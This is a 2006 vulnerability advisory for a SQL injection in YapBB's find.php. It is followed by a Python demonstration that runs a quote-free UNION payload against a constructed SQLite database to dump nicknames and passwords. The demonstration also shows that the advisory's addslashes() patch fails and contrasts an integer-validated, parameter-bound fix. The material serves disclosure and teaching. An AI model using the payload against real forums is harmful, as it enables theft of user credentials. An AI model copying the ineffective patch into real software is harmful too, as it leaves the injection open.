YapBB <= 1.2 Beta2 find.php SQL Injection Vulnerability
Tuesday, 16 May 2006
0x01 Summary

YapBB is an open-source web forum written in PHP.
(http://sourceforge.net/projects/yapbb)

find.php in this forum is vulnerable to SQL injection: the userID parameter is concatenated into a query without any validation.
So a malicious attacker can retrieve every nickname (id) and password stored by this YapBB.

Let's see the code ~!


0x02 Testbed

- Fedora Core 2
- MySQL Server 5.0.19-log
- PHP 5 ( magic_quotes_gpc = On; this does not help here, because $userID is inserted into the query unquoted, so no quote character is needed )


0x03 Codes

~/YapBB-1.2-Beta2/YapBB/find.php:
-
..
34: $userBool = $HTTP_POST_VARS["choice"]=="user"; // if choice == user
36: $userpostBool = !empty($HTTP_GET_VARS["userID"]); // userID == [inject sql]
..
119: else if ($userpostBool)
120: {
128: $postRes = $postQuery->select("SELECT p.date, t.id, t.description, u.nickname FROM " .
$cfgDatabase[post] . " AS p, " . $cfgDatabase[topic] . " AS t, " .
$cfgDatabase[user] . " AS u WHERE t.id = p.topicid AND p.posterid = $userID AND
u.id = p.posterid GROUP BY p.topicid ORDER BY p.date DESC LIMIT 50"); // execute sql!
-

No words.


I wrote an exploit for getting all YapBB users' nicknames and passwords.
Sorry, I can't put the exploit in this advisory =)


0x04 Exploit

[x90c@hackzen testbed]$ whoami
x90c
[x90c@hackzen testbed]$


0x05 Patch

~/YapBB-1.2-Beta2/YapBB/find.php:
..
128: $postRes = $postQuery->select("SELECT p.date, t.id, t.description, u.nickname FROM " .
$cfgDatabase[post] . " AS p, " . $cfgDatabase[topic] . " AS t, " . $cfgDatabase[user] .
" AS u WHERE t.id = p.topicid AND p.posterid = " . addslashes($userID) .
" AND u.id = p.posterid GROUP BY p.topicid ORDER BY p.date DESC LIMIT 50"); // x90c patch!

Note: addslashes() only escapes quote, backslash and NUL characters. Since $userID is still placed in the query unquoted, a payload that uses no quotes (for example a UNION clause built only from digits, keywords and a comment marker) passes through unchanged, so this patch does not close the hole. Check that the value is a plain integer and cast it before use, or bind it with a prepared statement, instead.
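The injection at find.php line 128 and the effect of the patch above, as an added example written for this page (Python with SQLite standing in for PHP/MySQL; this is not YapBB code). It rebuilds the same string concatenation, runs a quote-free UNION payload against a throwaway in-memory database with constructed rows, shows that addslashes() hands that payload back unchanged, and contrasts an integer-validated, parameter-bound version. The table names, sample rows and helper names are assumptions.

```python
"""Re-creation of the find.php:128 query, the injection, and two fixes.

Constructed example for this advisory page; not YapBB code.  The query is
rebuilt exactly as find.php concatenates it and run against an in-memory
SQLite database (standing in for MySQL) holding made-up rows.
"""
import re
import sqlite3

# Stand-ins for $cfgDatabase[post] / [topic] / [user] (assumed names).
CFG_DATABASE = {"post": "yapbb_post", "topic": "yapbb_topic", "user": "yapbb_user"}

# Constructed sample rows, not from any real installation.
SAMPLE_USERS = [(1, "admin", "s3cret"), (2, "alice", "hunter2")]          # id, nickname, password
SAMPLE_TOPICS = [(10, "Welcome"), (11, "Rules")]                          # id, description
SAMPLE_POSTS = [(100, 10, 1, "2006-05-01"), (101, 11, 2, "2006-05-02")]   # id, topicid, posterid, date

# Quote-free payload: same column count as the original SELECT, trailing SQL commented out.
PAYLOAD = "0 UNION SELECT nickname, password, 3, 4 FROM yapbb_user -- "


def build_db():
    """Create the three tables find.php joins and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        f"CREATE TABLE {CFG_DATABASE['user']} (id INTEGER, nickname TEXT, password TEXT);"
        f"CREATE TABLE {CFG_DATABASE['topic']} (id INTEGER, description TEXT);"
        f"CREATE TABLE {CFG_DATABASE['post']} (id INTEGER, topicid INTEGER, posterid INTEGER, date TEXT);"
    )
    conn.executemany(f"INSERT INTO {CFG_DATABASE['user']} VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.executemany(f"INSERT INTO {CFG_DATABASE['topic']} VALUES (?, ?)", SAMPLE_TOPICS)
    conn.executemany(f"INSERT INTO {CFG_DATABASE['post']} VALUES (?, ?, ?, ?)", SAMPLE_POSTS)
    return conn


def addslashes(s):
    """PHP addslashes(): prefix single quote, double quote, backslash and NUL with a backslash."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def find_query(user_id_fragment):
    """The concatenation at find.php:128; the fragment lands unquoted after 'p.posterid ='."""
    return (
        "SELECT p.date, t.id, t.description, u.nickname FROM "
        + CFG_DATABASE["post"] + " AS p, " + CFG_DATABASE["topic"] + " AS t, "
        + CFG_DATABASE["user"] + " AS u WHERE t.id = p.topicid AND p.posterid = "
        + user_id_fragment
        + " AND u.id = p.posterid GROUP BY p.topicid ORDER BY p.date DESC LIMIT 50"
    )


def run_original(conn, user_id):
    """Vulnerable: userID pasted into the SQL verbatim."""
    return conn.execute(find_query(user_id)).fetchall()


def run_addslashes_patch(conn, user_id):
    """The advisory's patch: addslashes() around userID, which is still unquoted."""
    return conn.execute(find_query(addslashes(user_id))).fetchall()


def is_valid_user_id(user_id):
    """Accept only a plain decimal integer; anything else never reaches the SQL engine."""
    return re.fullmatch(r"[0-9]+", user_id) is not None


def run_hardened(conn, user_id):
    """Validate first, then bind the value as a parameter instead of concatenating it."""
    if not is_valid_user_id(user_id):
        raise ValueError("userID must be an integer")
    return conn.execute(find_query("?"), (int(user_id),)).fetchall()


def leaked_credentials(rows):
    """(nickname, password) pairs as they appear in the UNIONed result columns."""
    return {(r[0], r[1]) for r in rows}


if __name__ == "__main__":
    db = build_db()
    print("original  :", leaked_credentials(run_original(db, PAYLOAD)))
    print("addslashes:", leaked_credentials(run_addslashes_patch(db, PAYLOAD)))
    print("hardened accepts payload?", is_valid_user_id(PAYLOAD))
```

The payload contains no quote, backslash or NUL, so addslashes() returns it byte-for-byte and the patched query leaks the same credentials as the original; only the version that rejects non-integers before building the query stops it.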